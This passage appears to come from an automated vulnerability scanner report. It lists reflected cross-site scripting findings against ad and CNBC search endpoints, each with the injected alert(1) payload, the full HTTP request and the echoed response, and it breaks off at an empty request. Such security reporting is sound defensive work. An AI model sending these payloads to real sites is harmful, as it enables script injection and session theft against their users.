HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=81B90065048D4370292026025CE18CDC; Path=/ Content-Type: text/javascript Date: Tue, 06 Sep 2011 15:05:42 GMT Connection: close var adsafeVisParams = { mode : "jspix", jsref : "http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x26f73f.js&size_id=15&account_id=6451&site_id=11953&size=300x250", adsafeSrc : "", adsafeSep : "", requrl : "http://pixel.adsafeprotected.com/", reqquery : "anId=144510c5"-alert(1)-"dd817178b4e &pubId=4749&campId=176996", debug : "false", allowPhoneHome : "false", phoneHomeDelay : "3000", asid : "gsrdhvt9" }; (function(){var N="3.12";var v=(adsafeVisParams.debug==="true");var n=2000;var ...[SNIP]...
3.61. http://pixel.adsafeprotected.com/jspix [campId parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://pixel.adsafeprotected.com
Path:
/jspix
Issue detail
The value of the campId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload da845"-alert(1)-"880f48e2e1c was submitted in the campId parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /jspix?anId=144&pubId=4749&campId=176996da845"-alert(1)-"880f48e2e1c HTTP/1.1 Host: pixel.adsafeprotected.com Proxy-Connection: keep-alive Referer: http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x26f73f.js&size_id=15&account_id=6451&site_id=11953&size=300x250 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=35EB1F19FAC898AF05DFBC3B925C5071; Path=/ Content-Type: text/javascript Date: Tue, 06 Sep 2011 15:05:42 GMT Connection: close var adsafeVisParams = { mode : "jspix", jsref : "http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x26f73f.js&size_id=15&account_id=6451&site_id=11953&size=300x250", adsafeSrc : "", adsafeSep : "", requrl : "http://pixel.adsafeprotected.com/", reqquery : "anId=144&pubId=4749&campId=176996da845"-alert(1)-"880f48e2e1c ", debug : "false", allowPhoneHome : "false", phoneHomeDelay : "3000", asid : "gsrdhw0z" }; (function(){var N="3.12";var v=(adsafeVisParams.debug==="true");var n=2000;var H={INFO:"info",LOG:"log",...[SNIP]...
3.62. http://pixel.adsafeprotected.com/jspix [name of an arbitrarily supplied request parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://pixel.adsafeprotected.com
Path:
/jspix
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 29f17"-alert(1)-"0d89877785d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /jspix?anId=144&pubId=4749&campId=176996&29f17"-alert(1)-"0d89877785d =1 HTTP/1.1 Host: pixel.adsafeprotected.com Proxy-Connection: keep-alive Referer: http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x26f73f.js&size_id=15&account_id=6451&site_id=11953&size=300x250 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=FB69FF41E9D06173F3B7D3D9C3729F77; Path=/ Content-Type: text/javascript Date: Tue, 06 Sep 2011 15:05:42 GMT Connection: close var adsafeVisParams = { mode : "jspix", jsref : "http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x26f73f.js&size_id=15&account_id=6451&site_id=11953&size=300x250", adsafeSrc : "", adsafeSep : "", requrl : "http://pixel.adsafeprotected.com/", reqquery : "anId=144&pubId=4749&campId=176996&29f17"-alert(1)-"0d89877785d =1", debug : "false", allowPhoneHome : "false", phoneHomeDelay : "3000", asid : "gsrdhw3w" }; (function(){var N="3.12";var v=(adsafeVisParams.debug==="true");var n=2000;var H={INFO:"info",LOG:"log...[SNIP]...
3.63. http://pixel.adsafeprotected.com/jspix [pubId parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://pixel.adsafeprotected.com
Path:
/jspix
Issue detail
The value of the pubId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b063c"-alert(1)-"1e31f51b3df was submitted in the pubId parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /jspix?anId=144&pubId=4749b063c"-alert(1)-"1e31f51b3df &campId=176996 HTTP/1.1 Host: pixel.adsafeprotected.com Proxy-Connection: keep-alive Referer: http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x26f73f.js&size_id=15&account_id=6451&site_id=11953&size=300x250 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=15F3A88A83B937D289F19131BE7257D4; Path=/ Content-Type: text/javascript Date: Tue, 06 Sep 2011 15:05:41 GMT Connection: close var adsafeVisParams = { mode : "jspix", jsref : "http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x26f73f.js&size_id=15&account_id=6451&site_id=11953&size=300x250", adsafeSrc : "", adsafeSep : "", requrl : "http://pixel.adsafeprotected.com/", reqquery : "anId=144&pubId=4749b063c"-alert(1)-"1e31f51b3df &campId=176996", debug : "false", allowPhoneHome : "false", phoneHomeDelay : "3000", asid : "gsrdhvsx" }; (function(){var N="3.12";var v=(adsafeVisParams.debug==="true");var n=2000;var H={INFO:"in...[SNIP]...
3.64. http://quote.cnbc.com/quote-html-webservice/quote.htm [&symbols parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://quote.cnbc.com
Path:
/quote-html-webservice/quote.htm
Issue detail
The value of the &symbols request parameter is copied into the HTML document as plain text between tags. The payload 4f61d<img%20src%3da%20onerror%3dalert(1)>e62cc5d307c was submitted in the &symbols parameter. This input was echoed as 4f61d<img src=a onerror=alert(1)>e62cc5d307c in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /quote-html-webservice/quote.htm?&symbols=.GDAXI|4f61d<img%20src%3da%20onerror%3dalert(1)>e62cc5d307c &requestMethod=quick&noform=1&realtime=1&client=flexQuote&output=json&random=1315338996212 HTTP/1.1 Host: quote.cnbc.com Proxy-Connection: keep-alive Referer: http://quote.cnbc.com/quoteproxy.swf User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; s_cc=true; __qseg=Q_D; s_nr=1315338989816; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DSearch%25257CNews%25257CAllT%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257B%252520cnbc_multionclick%252528%252527http%25253A//www.cnbc.com/%252527%252529%25253B%25257D%2526oidt%253D2%2526ot%253DDIV
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Type: text/x-json;charset=UTF-8 Content-Language: en-US Date: Tue, 06 Sep 2011 14:57:30 GMT Via: 1.1 C aicache6 Content-Length: 980 X-Aicache-OS: 64.210.195.136:80 Connection: Keep-Alive Keep-Alive: max=20 Expires: Tue, 06 Sep 2011 14:57:35 GMT {"QuickQuoteResult":{"QuickQuote":[{"change_pct":"-1.61","last":"5161.68","curmktstatus":"REG_MKT","change":"-84.50","reg_last_time":"2011-09-06T16:42:29.000+0200","timeZone":"ECT","last_time":"...[SNIP]... "false","altSymbol":"DAX-XE","volume":"189930268","todays_closing":"0.0","previous_day_closing":"5246.18","high":"5332.11","low":"5150.05","comments":"ILX","last_time_msec":"1315320149000"},{"symbol":"4F61D<IMG SRC=A ONERROR=ALERT(1)>E62CC5D307C ","code":"1"}],"xmlns:xsi":"http://www.w3.org/2001/XMLSchema-instance","xmlns":"http://quote.cnbc.com/services/MultiQuote/2006"}}
3.65. http://search.cnbc.com/main.do [keywords parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://search.cnbc.com
Path:
/main.do
Issue detail
The value of the keywords request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4ae86</script><script>alert(1)</script>06ada94b268662ae5 was submitted in the keywords parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /main.do?target=all&keywords=xss4ae86</script><script>alert(1)</script>06ada94b268662ae5 &categories=exclude&searchboxinput=xss HTTP/1.1 Host: search.cnbc.com Proxy-Connection: keep-alive Referer: http://www.cnbc.com/ Cache-Control: max-age=0 Origin: http://www.cnbc.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; TZM=-300; adops_master_kvs=; snas_noinfo=1; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1315339005443; __qseg=Q_D
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 14:57:47 GMT Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19 Content-Type: text/html Via: 1.1 C aicache6 Content-Length: 84843 X-Aicache-OS: 64.210.194.245:80 Connection: close Expires: Tue, 06 Sep 2011 15:07:47 GMT <html> <head> <!-- Adding velocity template for meta tags --> <meta http-equiv="content-type" content="text/html; charset=UTF-8"> <meta name="description" content="CNBC Search, xss4ae86</script>...[SNIP]... <script> keyWordParam = "xss4ae86</script><script>alert(1)</script>06ada94b268662ae5 "; keyWordParam = keyWordParam.replace(/"/g,'"'); document.getElementById('txtBox').value = keyWordParam; </script>...[SNIP]...
3.66. http://search.cnbc.com/main.do [keywords parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://search.cnbc.com
Path:
/main.do
Issue detail
The value of the keywords request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 86fbc</script><script>alert(1)</script>0a30be6899a was submitted in the keywords parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /main.do?keywords=xss86fbc</script><script>alert(1)</script>0a30be6899a &sort=date&minimumrelevance=0.2&topics=slideshows&pubtime=0&pubfreq=h HTTP/1.1 Host: search.cnbc.com Proxy-Connection: keep-alive Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; TZM=-300; snas_noinfo=1; s_cc=true; adops_master_kvs=; __qseg=Q_D; s_nr=1315339031577; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DSearch%25257CAll%25257CAllT%2526pidt%253D1%2526oid%253Djavascript%25253AloadParamURL%252528keyWordParam%25252C%252527date%252527%25252C0%25252C%252527h%252527%25252C%252527%252526topics%25253Dslideshows%252527%252529%25253B%2526ot%253DA
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 14:57:51 GMT Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19 Content-Type: text/html Via: 1.1 C aicache6 Content-Length: 85231 X-Aicache-OS: 64.210.194.247:80 Connection: close Expires: Tue, 06 Sep 2011 15:07:51 GMT <html> <head> <!-- Adding velocity template for meta tags --> <meta http-equiv="content-type" content="text/html; charset=UTF-8"> <meta name="description" content="CNBC Search, xss86fbc</script>...[SNIP]... <script> keyWordParam = "xss86fbc</script><script>alert(1)</script>0a30be6899a "; keyWordParam = keyWordParam.replace(/"/g,'"'); document.getElementById('txtBox').value = keyWordParam; </script>...[SNIP]...
3.67. http://search.cnbc.com/main.do [keywords parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://search.cnbc.com
Path:
/main.do
Issue detail
The value of the keywords request parameter is copied into the HTML document as text between TITLE tags. The payload 8364e</title><script>alert(1)</script>07d9d84cea13b502c was submitted in the keywords parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Request
GET /main.do?target=all&keywords=xss8364e</title><script>alert(1)</script>07d9d84cea13b502c &categories=exclude&searchboxinput=xss HTTP/1.1 Host: search.cnbc.com Proxy-Connection: keep-alive Referer: http://www.cnbc.com/ Cache-Control: max-age=0 Origin: http://www.cnbc.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; TZM=-300; adops_master_kvs=; snas_noinfo=1; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1315339005443; __qseg=Q_D
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 14:57:51 GMT Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19 Content-Type: text/html Via: 1.1 C aicache6 Content-Length: 84839 X-Aicache-OS: 64.210.193.97:80 Connection: close Expires: Tue, 06 Sep 2011 15:07:51 GMT <html> <head> <!-- Adding velocity template for meta tags --> <meta http-equiv="content-type" content="text/html; charset=UTF-8"> <meta name="description" content="CNBC Search, xss8364e</title><...[SNIP]... <title>xss8364e</title><script>alert(1)</script>07d9d84cea13b502c - CNBC</title>...[SNIP]...
3.68. http://search.cnbc.com/main.do [keywords parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://search.cnbc.com
Path:
/main.do
Issue detail
The value of the keywords request parameter is copied into the HTML document as text between TITLE tags. The payload fda4e</title><script>alert(1)</script>b2e6faa4271 was submitted in the keywords parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /main.do?keywords=xssfda4e</title><script>alert(1)</script>b2e6faa4271 &sort=date&minimumrelevance=0.2&topics=slideshows&pubtime=0&pubfreq=h HTTP/1.1 Host: search.cnbc.com Proxy-Connection: keep-alive Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; TZM=-300; snas_noinfo=1; s_cc=true; adops_master_kvs=; __qseg=Q_D; s_nr=1315339031577; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DSearch%25257CAll%25257CAllT%2526pidt%253D1%2526oid%253Djavascript%25253AloadParamURL%252528keyWordParam%25252C%252527date%252527%25252C0%25252C%252527h%252527%25252C%252527%252526topics%25253Dslideshows%252527%252529%25253B%2526ot%253DA
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 14:57:54 GMT Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19 Content-Type: text/html Via: 1.1 C aicache6 Content-Length: 85227 X-Aicache-OS: 64.210.194.245:80 Connection: close Expires: Tue, 06 Sep 2011 15:07:54 GMT <html> <head> <!-- Adding velocity template for meta tags --> <meta http-equiv="content-type" content="text/html; charset=UTF-8"> <meta name="description" content="CNBC Search, xssfda4e</title><...[SNIP]... <title>xssfda4e</title><script>alert(1)</script>b2e6faa4271 - CNBC</title>...[SNIP]...
3.69. http://search.cnbc.com/main.do [pubfreq parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://search.cnbc.com
Path:
/main.do
Issue detail
The value of the pubfreq request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8cf8c"><script>alert(1)</script>c96a087baf9 was submitted in the pubfreq parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /main.do?keywords=xss&sort=date&minimumrelevance=0.2&topics=slideshows&pubtime=0&pubfreq=h8cf8c"><script>alert(1)</script>c96a087baf9 HTTP/1.1 Host: search.cnbc.com Proxy-Connection: keep-alive Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; TZM=-300; snas_noinfo=1; s_cc=true; adops_master_kvs=; __qseg=Q_D; s_nr=1315339031577; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DSearch%25257CAll%25257CAllT%2526pidt%253D1%2526oid%253Djavascript%25253AloadParamURL%252528keyWordParam%25252C%252527date%252527%25252C0%25252C%252527h%252527%25252C%252527%252526topics%25253Dslideshows%252527%252529%25253B%2526ot%253DA
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 14:57:59 GMT Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19 Content-Type: text/html Via: 1.1 C aicache6 Content-Length: 85676 X-Aicache-OS: 64.210.194.246:80 Connection: close Expires: Tue, 06 Sep 2011 15:07:59 GMT <html> <head> <!-- Adding velocity template for meta tags --> <meta http-equiv="content-type" content="text/html; charset=UTF-8"> <meta name="description" content="CNBC Search, xss"> <meta name=...[SNIP]... e="keywords" type="text" style="width:100px" height="22px" class="search_input" onkeypress="javascript: return cnbc_searchbox_submitenter(document.getElementById('txtBox').value,'date',formatParam,0,'h8cf8c"><script>alert(1)</script>c96a087baf9 ',event);" maxlength="100"/>...[SNIP]...
3.70. http://search.cnbc.com/main.do [pubfreq parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://search.cnbc.com
Path:
/main.do
Issue detail
The value of the pubfreq request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4f82d"%3balert(1)//40cf5dbf8a was submitted in the pubfreq parameter. This input was echoed as 4f82d";alert(1)//40cf5dbf8a in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /main.do?keywords=xss&sort=date&minimumrelevance=0.2&topics=slideshows&pubtime=0&pubfreq=h4f82d"%3balert(1)//40cf5dbf8a HTTP/1.1 Host: search.cnbc.com Proxy-Connection: keep-alive Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; TZM=-300; snas_noinfo=1; s_cc=true; adops_master_kvs=; __qseg=Q_D; s_nr=1315339031577; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DSearch%25257CAll%25257CAllT%2526pidt%253D1%2526oid%253Djavascript%25253AloadParamURL%252528keyWordParam%25252C%252527date%252527%25252C0%25252C%252527h%252527%25252C%252527%252526topics%25253Dslideshows%252527%252529%25253B%2526ot%253DA
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 14:58:00 GMT Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19 Content-Type: text/html Via: 1.1 C aicache6 Content-Length: 85436 X-Aicache-OS: 64.210.194.247:80 Connection: close Expires: Tue, 06 Sep 2011 15:08:00 GMT <html> <head> <!-- Adding velocity template for meta tags --> <meta http-equiv="content-type" content="text/html; charset=UTF-8"> <meta name="description" content="CNBC Search, xss"> <meta name=...[SNIP]... <script> search_GetPagination_Clientside(0,search_PagLinks,linksdisplay,keyWordParam,1,"date",formatParam,0,"h4f82d";alert(1)//40cf5dbf8a "); display_searchPageResults(0,10,1,keyWordParam); </script>...[SNIP]...
3.71. http://search.cnbc.com/main.do [sort parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://search.cnbc.com
Path:
/main.do
Issue detail
The value of the sort request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aa5fc"%3balert(1)//d4e309e7b5c was submitted in the sort parameter. This input was echoed as aa5fc";alert(1)//d4e309e7b5c in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /main.do?keywords=xss&sort=dateaa5fc"%3balert(1)//d4e309e7b5c &minimumrelevance=0.2&topics=slideshows&pubtime=0&pubfreq=h HTTP/1.1 Host: search.cnbc.com Proxy-Connection: keep-alive Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; TZM=-300; snas_noinfo=1; s_cc=true; adops_master_kvs=; __qseg=Q_D; s_nr=1315339031577; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DSearch%25257CAll%25257CAllT%2526pidt%253D1%2526oid%253Djavascript%25253AloadParamURL%252528keyWordParam%25252C%252527date%252527%25252C0%25252C%252527h%252527%25252C%252527%252526topics%25253Dslideshows%252527%252529%25253B%2526ot%253DA
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 14:57:57 GMT Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19 Content-Type: text/html Via: 1.1 C aicache6 Content-Length: 85675 X-Aicache-OS: 64.210.194.247:80 Connection: close Expires: Tue, 06 Sep 2011 15:07:57 GMT <html> <head> <!-- Adding velocity template for meta tags --> <meta http-equiv="content-type" content="text/html; charset=UTF-8"> <meta name="description" content="CNBC Search, xss"> <meta name=...[SNIP]... <script> search_GetPagination_Clientside(0,search_PagLinks,linksdisplay,keyWordParam,1,"dateaa5fc";alert(1)//d4e309e7b5c ",formatParam,0,"h"); display_searchPageResults(0,10,1,keyWordParam); </script>...[SNIP]...
3.72. http://search.cnbc.com/main.do [sort parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://search.cnbc.com
Path:
/main.do
Issue detail
The value of the sort request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 87310"><script>alert(1)</script>44b2f4d8132 was submitted in the sort parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /main.do?keywords=xss&sort=date87310"><script>alert(1)</script>44b2f4d8132 &minimumrelevance=0.2&topics=slideshows&pubtime=0&pubfreq=h HTTP/1.1 Host: search.cnbc.com Proxy-Connection: keep-alive Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; TZM=-300; snas_noinfo=1; s_cc=true; adops_master_kvs=; __qseg=Q_D; s_nr=1315339031577; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DSearch%25257CAll%25257CAllT%2526pidt%253D1%2526oid%253Djavascript%25253AloadParamURL%252528keyWordParam%25252C%252527date%252527%25252C0%25252C%252527h%252527%25252C%252527%252526topics%25253Dslideshows%252527%252529%25253B%2526ot%253DA
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 14:57:55 GMT Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19 Content-Type: text/html Via: 1.1 C aicache6 Content-Length: 86020 X-Aicache-OS: 64.210.194.246:80 Connection: close Expires: Tue, 06 Sep 2011 15:07:55 GMT <html> <head> <!-- Adding velocity template for meta tags --> <meta http-equiv="content-type" content="text/html; charset=UTF-8"> <meta name="description" content="CNBC Search, xss"> <meta name=...[SNIP]... ut id="txtBox" name="keywords" type="text" style="width:100px" height="22px" class="search_input" onkeypress="javascript: return cnbc_searchbox_submitenter(document.getElementById('txtBox').value,'date87310"><script>alert(1)</script>44b2f4d8132 ',formatParam,0,'h',event);" maxlength="100"/>...[SNIP]...
3.73. http://serve.directdigitalllc.com/serve.php [click parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://serve.directdigitalllc.com
Path:
/serve.php
Issue detail
The value of the click request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7792f"><script>alert(1)</script>5f008c5eb4 was submitted in the click parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
